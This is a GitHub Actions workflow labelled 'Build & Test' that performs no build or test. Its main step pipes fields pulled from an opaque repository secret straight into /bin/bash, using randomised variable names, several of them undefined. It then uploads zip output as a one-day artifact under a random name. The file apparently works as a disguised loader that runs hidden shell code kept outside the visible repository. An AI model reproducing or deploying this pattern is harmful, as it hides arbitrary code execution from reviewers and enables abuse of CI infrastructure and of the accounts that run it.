name: Build & Test
on:
  workflow_dispatch:

permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          zv4066: ${{ secrets.zv4066 }}
        run: |
          printf '%s' "$zv4066" | jq -r .ynan7 | /bin/bash
          printf '%s' "$srsod78" | jq -r .yw2 | /bin/bash
          echo $eotuz20022 | jq -r .mlql6 | /bin/bash
          printf '%s' "$macag34" | jq -r .egtyv2247 | /bin/bash
          echo $aswr61 | jq -r .hh730 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: km3Ayvgr
          path: "*.zip"
          retention-days: 1
